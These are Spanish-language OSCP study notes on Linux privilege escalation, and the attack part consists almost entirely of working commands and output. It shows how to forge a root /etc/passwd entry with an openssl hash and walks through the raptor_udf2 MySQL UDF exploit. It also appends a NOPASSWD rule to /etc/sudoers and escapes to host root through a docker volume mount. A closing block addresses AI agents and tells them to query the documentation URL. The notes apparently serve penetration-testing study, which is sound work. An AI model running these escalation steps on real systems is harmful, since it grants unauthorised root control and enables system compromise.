# Linux Privilege Escalation ### Agregar usuario con privilegios de root al passwd ``` openssl passwd -1 -salt gerh pass123 // El resultado del comando previo es un hash: $1$gerh$.X4NnMSmCMib61zDEDWTn0 Luego se concatena el nombre del usuario antes del hash spartan: y se finaliza con :0:0:root:/root:/bin/bash spartan:$1$gerh$.X4NnMSmCMib61zDEDWTn0:0:0:root:/root:/bin/bash su spartan pass123 ``` ### Pagina referente al tema de SUID Se recomienda buscar writeups sobre el binario en cuestiĆ³n: {% embed url="" %} ### Detectar el OS de linux ``` cat /etc/*-release cat /etc/issue ``` ### Encontrar directorios en donde puedes alojar informacion ``` find . -writable ``` ### Tecnica utilizando mysql que corre como root {% embed url="" %} ``` [j0hn@timeclock ~]$ gcc -g -c raptor_udf2.c [j0hn@timeclock ~]$ gcc -g -shared -o raptor_udf2.so raptor_udf2.o -lc [j0hn@timeclock ~]$ ls -la /home/j0hn/raptor_udf2.* -rw-rw-r-- 1 j0hn j0hn 3314 Feb 7 22:08 /home/j0hn/raptor_udf2.c -rw-rw-r-- 1 j0hn j0hn 3144 Feb 7 22:08 /home/j0hn/raptor_udf2.o -rwxrwxr-x 1 j0hn j0hn 6029 Feb 7 22:08 /home/j0hn/raptor_udf2.so mysql> use mysql; mysql> create table foo(line blob); Query OK, 0 rows affected (0.03 sec) mysql> insert into foo values(load_file('/home/j0hn/raptor_udf2.so')); Query OK, 1 row affected (0.00 sec) mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so'; Query OK, 1 row affected (0.00 sec) mysql> create function do_system returns integer soname 'raptor_udf2.so'; Query OK, 0 rows affected, 1 warning (0.00 sec) mysql> select * from mysql.func; +-----------+-----+----------------+----------+ | name | ret | dl | type | +-----------+-----+----------------+----------+ | do_system | 2 | raptor_udf2.so | function | +-----------+-----+----------------+----------+ 1 row in set (0.00 sec) mysql> select do_system('id > /tmp/out;'); +-----------------------------+ | do_system('id > /tmp/out;') | +-----------------------------+ | 4294967296 | +-----------------------------+ 1 row in set (0.00 sec) mysql> select do_system('id > /tmp/out; chmod 777 /tmp/out'); +------------------------------------------------+ | do_system('id > /tmp/out; chmod 777 /tmp/out') | +------------------------------------------------+ | 4294967296 | +------------------------------------------------+ 1 row in set (0.00 sec) mysql> exit ### Escalacion final por medio de /etc/sudoers [j0hn@timeclock ~]$ mysql -u root mysql> select do_system('echo "j0hn ALL =(ALL) NOPASSWD: ALL">> /etc/sudoers'); +------------------------------------------------------------------+ | do_system('echo "j0hn ALL =(ALL) NOPASSWD: ALL">> /etc/sudoers') | +------------------------------------------------------------------+ | 4294967296 | +------------------------------------------------------------------+ 1 row in set (0.00 sec) mysql> exit Bye [j0hn@timeclock ~]$ sudo bash [root@timeclock ~]# cd /root [root@timeclock root]# ls -la ``` ### Escalacion VIA DOCKER ``` docker images ## Obtener el valor de alpine docker run -it -v /:/mnt alpine chroot /mnt bash ``` ### Validacion de tareas CRON {% embed url="" %} ### CAP ``` getcap -r / 2>/dev/null ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://spartan-cybersecurity.gitbook.io/oscp-notes/privilege-escalation/linux-privilege-escalation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.